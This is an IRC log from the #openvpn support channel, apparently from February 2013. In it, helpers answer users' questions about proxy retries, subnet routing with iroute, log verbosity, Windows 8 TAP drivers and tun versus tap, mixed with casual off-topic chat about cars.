15:51 < pekster> ecrist: You don't indoor rock climb by chance, do ya?
15:53 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
16:05 < dbhaber> snooze
16:08 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection]
16:11 -!- xtreme_ [~wtf@193.28.228.85] has joined #openvpn
16:12 -!- discojoe [~wtf@193.28.228.85] has quit [Ping timeout: 255 seconds]
16:13 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 264 seconds]
16:14 < jtrimmer> pekster: thank you for the help. I finally got it working. Sometimes it helps to have someone else's head to use.
16:15 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 248 seconds]
16:18 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn
16:18 -!- mete [~mete@mete.shell.la] has joined #openvpn
16:20 < KiNgMaR> I'm having OpenVPN connect through an HTTP proxy. sometimes, this happens: openvpn[32336]: HTTP proxy returned: 'HTTP/1.0 503 Service Unavailable' and OpenVPN shuts down (SIGTERM[soft,init_instance] received, process exiting). is there an option to make it keep retrying?
16:23 < pekster> KiNgMaR, are you using (or pushing from the server) --keepalive, or the --ping + --ping-restart options?
16:25 < KiNgMaR> pekster: no, I don't. I found http-proxy-retry now, though, maybe that'll help :-)
16:25 < pekster> Ah, okay. I guess it has its own mechanism for that (I don't need to deal with openvpn over http proxies, thankfully)
16:26 < KiNgMaR> apart from that, it's working very well :-)
16:29 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit []
16:37 -!- Orbi [~opera@109.129.21.144] has joined #openvpn
16:39 -!- Orbi [~opera@109.129.21.144] has quit [Read error: Connection reset by peer]
16:39 -!- Orbi [~opera@109.129.21.144] has joined #openvpn
16:39 -!- Orbi [~opera@109.129.21.144] has left #openvpn []
16:39 -!- exitnode [~androirc@HSI-KBW-149-172-26-60.hsi13.kabel-badenwuerttemberg.de] has joined #openvpn
16:40 -!- Teck7 [~teck7@76.65.60.225] has joined #openvpn
16:42 -!- p3rror [~mezgani@41.249.144.158] has quit [Read error: Connection reset by peer]
16:42 -!- rfxn [~teck7@69.157.152.252] has quit [Ping timeout: 245 seconds]
16:44 -!- exitnode [~androirc@HSI-KBW-149-172-26-60.hsi13.kabel-badenwuerttemberg.de] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )]
16:59 -!- dbhaber_ [me@208.99.80.128] has joined #openvpn
17:00 -!- dbhaber [me@208.99.80.128] has quit [Read error: Connection reset by peer]
17:01 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 256 seconds]
17:01 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 256 seconds]
17:01 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
17:01 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
17:01 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
17:01 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 256 seconds]
17:02 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:03 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
17:03 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn
17:18 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds]
17:27 -!- p3rror [~mezgani@41.249.144.158] has joined #openvpn
17:33 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving]
17:35 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn
17:38 < KaiForce> has a fix been identified for the problem described here; https://forums.openvpn.net/topic11901.html
17:38 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN crash windows8 x64 - 2.3 build : Testing branch (at forums.openvpn.net)
17:43 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn
17:43 -!- eres [~rs@onyon.net] has quit [Ping timeout: 276 seconds]
17:45 < plut0> is there a fix to the ntlm authentication issue for proxies in the latest version? https://forums.openvpn.net/topic7945-15.html
17:45 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN client behind ISA ( Forefront TMG ) : Configuration - Page 2 (at forums.openvpn.net)
17:46 < plut0> getting this when trying to connect, "received corrupted data from proxy server"
17:48 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn
17:48 < baobeiiii> morning/night
17:49 -!- eres [~rs@onyon.net] has joined #openvpn
17:54 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Read error: Connection reset by peer]
17:56 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn
17:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
18:06 -!- p3rror [~mezgani@41.249.144.158] has quit [Ping timeout: 248 seconds]
18:06 -!- baobeiiii_ [~baobeiiii@192.73.244.224] has joined #openvpn
18:10 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Ping timeout: 240 seconds]
18:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:20 < dbhaber_> hm
18:26 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 244 seconds]
18:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
18:27 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!]
18:28 -!- gardar [~gardar@gardar.net] has joined #openvpn
18:37 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 264 seconds]
18:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
18:38 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 248 seconds]
18:39 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds]
18:39 -!- defswork [~andy@141.0.50.105] has joined #openvpn
18:48 -!- jaws [~root@5.231.5.192] has joined #openvpn
18:54 < plut0> anyone?
18:58 < jaws> yea
18:59 < plut0> getting this when trying to connect, "received corrupted data from proxy server"
19:01 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
19:06 -!- zach [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has joined #openvpn
19:07 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection]
19:08 < zach> Good day gents and ladies. I'm looking for some insight on whether my idea is possible -- I have two clients - one server, is it possible to route other subnets behind the clients to, well - other clients? ie: client1 - 10.0.5.0/24 is where they're connecting from, client2 is in 10.10.10.0/24 -- what I would like to do is make it so both sides (client 1 & client 2) can see other addresses within the respective subnets.
19:17 <@ecrist> yes
19:17 <@ecrist> !route
19:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
19:17 <@ecrist> !iroute
19:17 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefore belongs in a ccd entry. Also see !route and !ccd
19:17 <@ecrist> read up, this isn't networking 101
19:17 <@ecrist> if you run into a genuine issue, feel free to ask, though. :)
19:19 < zach> haha, yeah - I thought that was the way, I just wanted to confirm, was already going down that road
19:19 <@ecrist> excellent
19:19 < zach> writing out my default routes, just wanted to confirm I was going about it in the right way
19:19 <@ecrist> what you're trying to do is very common
19:19 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has quit [Ping timeout: 245 seconds]
19:19 < zach> I have ~15 routes on one side (client 1) that need to be accessible via client 2, so it's just a lot of typing of routes
19:20 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn
19:20 <@ecrist> yup
19:20 < zach> I just want to confirm, I do the routes on my server, push routes to each client via openvpn?
19:20 <@ecrist> yup
19:20 < zach> or routes on server + routes on each client manually
19:20 < zach> either will work, I imagine
19:20 <@ecrist> and pass iroute for the client with the routes behind
19:21 < zach> awesome
19:21 < zach> I knew I was on the right track, sometimes you just need confirmation
19:21 < zach> I appreciate it ecrist
19:25 <@ecrist> :)
19:26 < zach> far more simple than I expected too, good to know about iroute
19:27 < baobeiiii_> ach my openvpn log is 2Mb after just 1 day running
19:27 -!- zz_AsadH is now known as AsadH
19:27 < zach> mine is ~50 for less than a week, very busy server
19:28 < baobeiiii_> mine has only 2 clients
19:28 < baobeiiii_> it's because of an error message that occurs every 60 seconds
19:29 < zach> what's the error message?
19:29 -!- raidz is now known as raidz_away
19:29 < baobeiiii_> pekster mentioned how to stop the error message from being logged but at the time I didn't take notes ;)
19:32 < plut0> getting this proxy error when trying to connect, "received corrupted data from proxy server"
19:38 < plut0> is there no fix?
19:41 < baobeiiii_> zach, waiting on the file to open so i can paste it
19:41 < baobeiiii_> something about an ip packet with type 15
19:44 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn
19:50 < jtrimmer> I know I can redirect all internet traffic through the vpn but is there a way to push a route or option to make a client lan ip redirect only its internet traffic through the vpn?
19:57 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
19:58 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
20:00 < AndrewX192> jtrimmer: set your default gateway accordingly, and add a static route for your local network
20:11 <@ecrist> baobeiiii_: what do you have for verb in your config?
20:13 < baobeiiii_> i set it to 6
20:23 <@ecrist> that's why
20:24 <@ecrist> a working VPN only needs a 2 or 3
20:24 <@ecrist> we consider 5 "very verbose"
20:25 < plut0> anyone have a fix for this proxy issue? "received corrupted data from proxy server"
20:25 <@ecrist> !logs
20:25 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you don't know how to find your logs, see !logfile
20:25 <@ecrist> !configs
20:25 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) don't forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
20:25 <@ecrist> plut0: see above
20:32 < dbhaber_> yawn
20:32 < dbhaber_> ecrist: i am going to do my best to get active and keep the forums pruned
20:32 < dbhaber_> i just nuked a half dozen spam posts today
20:32 < dbhaber_> i'm happy to see it's getting good use
20:33 < dbhaber_> how did my nick end pu with a _
20:33 < dbhaber_> up
20:33 < dbhaber_> how the f does someone own this
20:34 <@ecrist> 16:59:43 -!- dbhaber_ [me@208.99.80.128] has joined #openvpn
20:34 <@ecrist> 17:00:24 -!- dbhaber [me@208.99.80.128] has quit [Read error: Connection reset by peer]
20:34 <@ecrist> that's why
20:40 <+hazardous> is that dougy
20:44 < dbhaber_> i see
20:44 < dbhaber_> apparently someone owns this nick
20:44 < dbhaber_> hazardous: who are you?
20:47 <@ecrist> dbhaber_: nobody owns that nick, you just had a connection failure
20:49 < pekster> That said, you're free to register the nick with nickserv if you'd like to maintain official ownership of it: https://www.freenode.net/faq.shtml#userregistration
20:49 <@vpnHelper> Title: freenode: frequently-asked questions (at www.freenode.net)
20:50 < pekster> (You'll want to change your nick first, unless you actually wanted the trailing underscore ;)
20:50 <@ecrist> dbhaber_: that said, the person who registered Dougy used it for 2 weeks and hasn't been seen in 6 months
20:50 <@ecrist> so, go to #freenode and ask them to release the nick
20:52 <+hazardous> dbhaber_: i occasionally browse wht, not a member though
20:52 < dbhaber_> ah
20:52 < dbhaber_> yeah, that is me
20:52 < dbhaber_> that cesspool
20:53 <@ecrist> what cesspool?
20:53 < dbhaber_> wht
20:53 < dbhaber_> www.wht.us
20:53 <@ecrist> gay\
20:54 <@ecrist> dbhaber_: did you see my new car?
20:55 < dbhaber_> ecrist: ha
20:55 < dbhaber_> i haven't talked to you in like 2 years motherf'er
20:55 < dbhaber_> lets see it
20:55 <@ecrist> http://secure-computing.net/files/bmw.jpg
20:55 < dbhaber_> http://images.thetruthaboutcars.com/2008/12/4x4metro.jpg
20:55 < dbhaber_> is this it?
20:55 < dbhaber_> hey, not bad
20:56 < dbhaber_> what year
20:56 <@ecrist> 2013
20:56 < dbhaber_> tbh, I have nothing against BMW
20:56 < dbhaber_> I just won't ever own one
20:56 <@ecrist> took delivery Nov 13
20:56 < dbhaber_> that's a car that someone with a bunch of money has
20:56 < dbhaber_> I have a 2010 Hyundai Sonata, decent car
20:56 < dbhaber_> it was cheap
20:56 < dbhaber_> very cheap
20:57 <@ecrist> no, what I have is a car that someone who USED TO have a bunch of money, has
20:57 < dbhaber_> true
20:57 < dbhaber_> :)
20:57 < dbhaber_> My car was 12k with 24k on the clock
20:57 <@ecrist> that being said, it's fan fucking tastic
20:57 < dbhaber_> heh
20:57 < dbhaber_> I'm not sure what car I want next
20:57 <@ecrist> mine was $64,450 with 11 miles on the clock
20:57 < dbhaber_> Putting money away now.. my next investment is either going to be a house or a nice car in 2-3 years
20:57 < dbhaber_> well, that's a lot of money
20:58 < dbhaber_> that's probably the total i've earned in my entire life
20:58 <@ecrist> heh, I'm sure you've earned more, but just barely. :P
20:58 < dbhaber_> i like driving my friend's car
20:58 < dbhaber_> these are both his
20:58 < dbhaber_> https://sphotos-b.xx.fbcdn.net/hphotos-ash3/553414_4730163253724_52285560_n.jpg
20:58 < dbhaber_> or rather one is his and one is his brother's
20:59 < dbhaber_> he just bought a range rover and a 2013 M3 and a Bentley
20:59 <@ecrist> you have wealthy friends
21:00 < dbhaber_> For a 20 year old who isn't a valet, I've driven some cool cars. Driven a Lamborghini LP640 and Aventador, a Ferrari California from the late 2000's
21:00 < dbhaber_> ecrist: Just a couple. I don't make much money.
21:01 < dbhaber_> I work for $25/hr now which is good for 20 years old I suppose.. plus a $1500/mo side job.. well, it's a $1500/mo retainer salary but some months i don't work at all.. others i work 6-10 hours
21:01 <@ecrist> not doing too shappy
21:01 <@ecrist> shabby*
21:02 <@ecrist> that's 50k/year
21:02 < dbhaber_> Could be doing better
21:02 < dbhaber_> My friend offered me to go into business with this IT gig he was doing in NYC
21:02 <@ecrist> and so could I
21:02 < dbhaber_> he just turned 19, 100k in the bank, equity in a few pretty large companies, 100k+ salary
21:02 < dbhaber_> i coulda had 30%
21:03 < dbhaber_> but i was still in HS when it started like he was, but he went to HS in NYC i believe.. and i did in NJ. so he was just an MTA ride away from work, I was a 30+ minute commute after HS.. didn't make sense
21:11 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
21:11 -!- mode/#openvpn [+o krzee] by ChanServ
21:14 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has left #openvpn []
21:15 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn
21:16 -!- mikey_w [~mike@71.63.115.202] has quit [Remote host closed the connection]
21:23 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
21:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 260 seconds]
21:35 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn
21:37 < baobeiiii> zach, Tue Feb 19 22:34:25 2013 IP packet with unknown IP version=15 seen
21:38 -!- baobeiiii_ [~baobeiiii@192.73.244.224] has quit [Ping timeout: 255 seconds]
21:49 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit []
21:49 -!- baobeiiii_ [~baobeiiii@180.155.14.35] has joined #openvpn
21:53 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Ping timeout: 248 seconds]
22:03 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
22:07 -!- MaxDamage [Damage@46.238.18.82] has joined #openvpn
22:07 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 248 seconds]
22:07 < MaxDamage> Hey guys. Anyone have issues with the openvpn TAP adapter under win8? It used to work great under win7.
22:07 < MaxDamage> Both x64, AMD.
22:08 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
22:08 < MaxDamage> It's not signed, so Windows is refusing to use it.
22:10 < MaxDamage> I guess my question would be, does anyone have a self-signed driver, since I can't really figure out how to sign my own :>
22:14 < pekster> The 2.3.0 release should have a signed driver, or at least it did when I installed it in the Win 8 developer preview prior to RTM (I don't have a copy myself)
22:14 < pekster> In my home Vista x64 installation, I get a prompt on first-install asking if I want to install the driver which is signed by "OpenVPN Technologies"
22:15 < pekster> Maybe check your local security policy on driver installation policy setting?
22:16 < MaxDamage> Yeah, I had that message in Windows 7 as well, but Windows 8 outright refuses to install it.
22:17 < pekster> You using the latest version/build? 2.3.0 build I004 is the latest
22:19 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn
22:19 < MaxDamage> Let me see...
22:20 < MaxDamage> hm, for some reason it's 2.0.9
22:20 < pekster> That version is years old
22:20 < pekster> You really ought to use a more recent version
22:20 < MaxDamage> lol
22:20 < MaxDamage> yeah
22:20 < pekster> Circa 2006 ;)
22:21 < pekster> I can almost guarantee that's your issue
22:21 < pekster> http://openvpn.net/index.php/open-source/downloads.html
22:21 <@vpnHelper> Title: Community Downloads (at openvpn.net)
22:21 < MaxDamage> Hahaha, oh wow
22:21 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 244 seconds]
22:21 < MaxDamage> Yeah, that's it.
22:21 < MaxDamage> I don't know why, but Google took me to openvpn.se
22:22 < MaxDamage> I haven't really done anything with it for a year or so, so I don't remember how it went
22:22 < MaxDamage> Yup, it does work now. :)
22:25 < baobeiiii_> lol someone's actually using windows 8?
22:29 < baobeiiii_> pekster, hey, could you remind me of that way to remove the message from being posted in the log
22:29 < baobeiiii_> i was too tired to take it in
22:32 < pekster> baobeiiii_: Reduce the log level below what that message is set at (I don't know if verb 2 or 1 works, although that'll hide other messages too. Even at 'verb 0' critical errors are still logged.) Optionally, I suggested you use a logging daemon and filter it out
22:33 < dbhaber_> GOD DAMN
22:33 < dbhaber_> i hate windows 8
22:34 < pekster> baobeiiii_: You did correctly verify that it wasn't a --comp-lzo mis-match, right? Both the configs match exactly, and it's not getting added at one end through command-line values or such?
22:34 < MaxDamage> baobeiiii_, yeah, *actually* using windows 8 :>
22:34 < baobeiiii_> both configs match perfectly
22:36 < MaxDamage> Uhh, actually, where do I put the keys again? In config/? :3
22:37 < pekster> MaxDamage: \config\ is standard, although technically you can put them anywhere you'd like on the filesystem. The GUI will pick up .ovpn configs in sub-directories off the config dir too
22:37 < MaxDamage> Thanks, pekster.
22:37 < baobeiiii_> i'll ask in linux how to use a logging filter
22:37 < pekster> Yea, that's distro-specific and depends on your syslog package
22:38 < baobeiiii_> then i'll ask in centos ;)
22:38 < pekster> You'll want to ask how to filter out the message based on that specific text match, since you want other logs/warnings/errors from openvpn, presumably
22:38 < baobeiiii_> yep confirmed still getting it even with verb 1
22:39 < baobeiiii_> woke up today with a 2mb log file
22:39 < pekster> Well, technically 'verb 0' is valid too, but still logs critical errors. And TBH you're going to miss a lot of potentially useful stuff at verb 0
22:40 -!- baobeiiii_ is now known as register
22:40 -!- register is now known as baobeiiii
22:43 < MaxDamage> pekster, I should have 'client' in my client config, right? :>
22:44 < MaxDamage> Because I get this when trying to connect http://pastebin.com/9Z26JHq3
22:45 < MaxDamage> And this is the config: http://pastebin.com/nvWp056u
22:45 < MaxDamage> Edited the sample
22:45 < pekster> That error is worthless. Program logs are less worthless
22:46 < MaxDamage> Never mind, got it. The GUI itself produced no output, so I thought there wasn't any in the logs either.
22:46 < MaxDamage> My bad.
22:46 < MaxDamage> ;p
22:48 < MaxDamage> Okay, so this is a bit strange, now. http://pastebin.com/XycayjSF
22:50 < pekster> The GUI passes your decryption passphrase via the management channel, so that's normal
22:50 < pekster> ie: you must provide the password in the graphical box that comes up. The program's execution is halted (in a "hold" state) until it gets the necessary info
22:51 < MaxDamage> I'm not being asked for a password anywhere, though there is a change password option when I right click on the system tray icon.
22:52 < pekster> Is the config you pasted earlier still valid?
22:52 < MaxDamage> Yup.
22:52 < pekster> Ideally comments/whitespace should be removed, but I can grep them out too if you don't have a proper stream editor like sed/grep on hand to do it
22:52 < MaxDamage> I don't. :>
22:52 < MaxDamage> And thank you.
22:53 < pekster> Well, some sed turns your massive config into this: http://fpaste.org/ysuf/
22:54 < pekster> If your private key is encrypted, it'll prompt you with a box to decrypt it, and that appears to be what is happening based on your logs; you should get a "password" box
22:54 < baobeiiii> i'm thinking if it is definitely related to comp lzo then maybe on the server it's 'broken'
22:55 < MaxDamage> hahah
22:55 < pekster> baobeiiii: Post logs from 'verb 4' and include all the variable settings from both the client and server, since that'll tell what the comp-lzo settings are
22:55 < MaxDamage> Yes, I got it. It works now.
22:56 < MaxDamage> It took a while to get a DHCP address, though.
22:56 < pekster> Why use tap?
22:56 < pekster> !tunortap
22:56 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Don't waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
22:56 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
22:57 < MaxDamage> pekster, it says Win32 TAP interface in ncpa.cpl
22:57 < MaxDamage> so I'd say tap
22:57 < pekster> No, your config
22:57 < MaxDamage> Also tap.
22:58 < pekster> You are operating in tap mode; why not use tun? Do you actually need to pass Ethernet frames or do multicast across the tunnel?
22:58 < pekster> (if you don't know what those are, you don't need it)
22:58 < MaxDamage> Because I trust my vpn comrades to not screw with the network. :>
22:59 < MaxDamage> And since I'll probably have to get them on skype and teamviewer to have them join it in the first place, i don't think they can
22:59 < pekster> It's just a waste of overhead (packet size goes up) and network traffic as things like ARP broadcasts and link-broadcasts like NBNS waste space
22:59 < baobeiiii> pekster, it's very verbose! http://pastebin.com/q0CjBBDm
23:00 < pekster> skype and teamviewer are not Ethernet-level protocols; they work fine across a tun setup
23:00 < MaxDamage> pekster, I know, I just need it to walk them through the vpn installation.
23:00 -!- Devastator- [~devas@186.214.110.45] has joined #openvpn
23:00 < MaxDamage> Can you give me an example of an ethernet based protocol?
23:00 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds]
23:01 < pekster> ARP, IPX, IPv6 Router-Announcements would be Ethernet protocols
23:03 < MaxDamage> LAN gaming is also an option, btw
23:03 < MaxDamage> and if we want to play Carmageddon 2, we need IPX
23:03 < MaxDamage> :>
23:04 < pekster> That's potentially valid then, although nothing modern uses IPX (no clue how old that game is.) fwiw, most games today work fine over tun too, you just can't expect the "find games on my LAN" feature to work since that usually uses subnet broadcasts
23:06 < baobeiiii> noticed a few weird things in the server log regarding dropped packets
23:07 < MaxDamage> pekster, yeah, it was released nov 30, 1998
23:08 < pekster> baobeiiii: Windows? wtf is it trying to source from fe80::/10? :(
23:08 < MaxDamage> And don't spare any technical details, I do low level support for an ISP in the UK.
23:08 < pekster> That OS is so stupid sometimes
23:09 < baobeiiii> my client is running windows 7 64
23:09 < baobeiiii> no idea what fe80 is
23:09 < pekster> MaxDamage: No, that's basically it. tun saves on overhead (ie: no need to encapsulate the Ethernet frame header in the payload) and doesn't waste UDP packets sending network broadcasts for crap like ARP/NBNS/uPnP/whatever-else-is-on-your-LAN
23:10 < MaxDamage> pekster, the main usage for the VPN would be, for now, secure communication over IRC or voice protocols, http, ftp, DNS and things to that degree
23:10 < pekster> baobeiiii: IPv6 link-local. Your openvpn config does not enable IPv6, so openvpn rightfully drops traffic sourced from a protocol you don't even support over the link
23:11 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer]
23:11 < pekster> MaxDamage: Right. Those are all above the IP protocol. tap=Ethernet, tun=IP
23:11 < MaxDamage> I see, yeah.
23:11 < MaxDamage> So tun would be far more secure too, then?
23:11 < pekster> It's not "wrong" to use tap, just a waste of overhead. If you're not actually bridging to your physical LAN then it's also completely a waste
23:12 < baobeiiii> i've disabled ipv6 on the adapter in windows, might fix that
23:12 < MaxDamage> lol
23:12 < pekster> baobeiiii: Yea, that's possible. I've also seen Windows use a source address from a LAN adapter across a Windows adapter too. That OS does the dumbest things sometimes
23:12 < MaxDamage> Nope, those will be independent networks
23:13 < pekster> Erm, source from a physical LAN NIC on the tun/tap device is what I meant
23:13 < pekster> Yea, if you're routing between them there's no need at all to use tap unless you actually wanted to do Ethernet-stuff strictly on the VPN. As soon as you route to another network you've passed the subnet barrier
23:14 < pekster> Ethernet/subnet broadcasts are strictly bound to the link-domain (some higher-level protocols can relay across these boundaries, but the broadcast itself is a Layer 2 thing)
23:15 < pekster> Your call, but I'd suggest you switch to tun. Besides possible gaming implications, nothing you've said requires tap. And even the games should work fine as long as you connect via server IP and not 'broadcast a lot to find game servers on my LAN' stuff
23:15 -!- AsadH is now known as zz_AsadH
23:16 < baobeiiii> pekster, that fixed that fe80 message
23:16 < baobeiiii> had ip6 unticked on wireless adapter i'm using but not on tap adapter
23:16 < baobeiiii> tun rather
23:16 < MaxDamage> Well, the switch seems fairly easy. Just edit the config. Thanks for the advice, though. :) Wish I could buy you a beer
23:16 < pekster> baobeiiii: What about the proto 15 spam?
23:16 < baobeiiii> still ongoing every 60 seconds
23:19 < baobeiiii> maybe i should try with comp lzo disabled
23:19 < baobeiiii> would show if it's something to do with that
23:19 < pekster> baobeiiii: Hm, actually, I can't confirm the lzo setting on the client completely matches due to a bug in the 2.3.0 build that hides the info I want. However, it should be OK based on the config settings
23:19 < pekster> Are you launching via the included GUI?
23:19 < MaxDamage> pekster, strange. My log file is being spammed with "rWrWrW" in the end.
23:19 < baobeiiii> pekster, yes
23:19 < pekster> MaxDamage: Lower verbosity to 3
23:20 < MaxDamage> ah
23:20 < pekster> at >=5 you get 'rwRW' printed for every packet
23:20 < baobeiiii> a bug? please report it!
23:20 < baobeiiii> bug supposed to be gone by the final release
23:20 < baobeiiii> bugs*
23:20 < pekster> baobeiiii: Yea, I just discovered it today. It's a small problem that just hides the config printout from the logs, so it's not a huge deal outside of debugging implications
23:20 < pekster> It's on my todo list tonight
23:20 < baobeiiii> ah woops
23:21 < baobeiiii> the connection log i showed from my client was verb 3 not 4
23:21 < baobeiiii> so it wouldn't match the level of detail
23:21 < baobeiiii> ach no it was 4 lol
23:21 < pekster> The client still shows it's a 2.3.0 release, which won't do anything at verb 4
23:21 < baobeiiii> <--- tired
23:21 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has joined #openvpn
23:21 < pekster> (basically, the release bug prevents 2.3.0 clients on Windows from treating verb 4 any differently than verb 3)
23:21 < baobeiiii> did you tell the devs?
23:21 < pekster> Dude...
23:21 < pekster> < pekster> It's on my todo list tonight 23:22 < pekster> If you want it done faster than "tonight" go submit a proper well-written bugreport yourself 23:22 < baobeiiii> no need to go agro 23:23 < baobeiiii> i meant to ask will u tell the devs 23:23 < pekster> Based on what I can see about the options strings from the client, it looks like both clients have the implicit 'adaptive' mode (line 480 to 481 in your paste) 23:25 < baobeiiii> lol my cents channel told me to fix the source of the problem rather than 'hide' it 23:25 < baobeiiii> centos* 23:26 < pekster> Right, that would be better 23:26 < baobeiiii> well if you can't, i'm 100% sure i can't 23:26 < pekster> I suggested yesterday you start the server without any clients at higher verb levels and see if you get per-packetk data from the source 23:26 < baobeiiii> i did 23:26 < baobeiiii> just the client verb 6 23:26 < pekster> I can'd reproduce your error, so I can't actually do anything from here 23:26 < baobeiiii> still got it 23:26 < pekster> You tried 6 23:26 < pekster> verb levels go up to 9 23:27 < pekster> (at least, I guess I haven't checked the upper bound) 23:27 < baobeiiii> if 1 3 4 and 6 show it of course 9 would 23:27 < pekster> No, packet-level debug 23:27 < pekster> Obviously you don't get developer debug output at verb 3... 23:27 < baobeiiii> ok, i didn't because you said it printed the keys or something, i'll try that now 23:27 < pekster> I'm not interseted in the error you see; I'm interested in debug output you currently don't see 23:27 < MaxDamage> pekster, when I do ifconfig in the server, the device is tun0. Does that mean that tap won't really work okay, or should I just stop being stupid? :> 23:28 < pekster> verb 7 shouldn't print the x509 keys, but it will print symmetric keys used 23:28 < baobeiiii> that's not too bad they change every hour 23:29 < pekster> Right. 
